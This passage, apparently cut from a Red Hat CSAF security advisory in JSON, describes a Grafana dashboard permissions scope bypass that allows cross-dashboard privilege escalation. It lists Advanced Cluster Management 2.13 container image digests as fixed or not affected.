"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2433242"
}
],
"notes": [
{
"category": "description",
"text": "An authorization error has been discovered in Grafana dashboards. The dashboard permissions API does not verify the target dashboard scope and only checks the dashboards.permissions:* action. As a result, a user who has permission management rights on one dashboard can read and modify permissions on other dashboards. This is an organization\u2011internal privilege escalation.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "grafana/grafana/pkg/services/dashboards: Grafana Dashboard Permissions Scope Bypass Enables Cross\u2011Dashboard Privilege Escalation",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
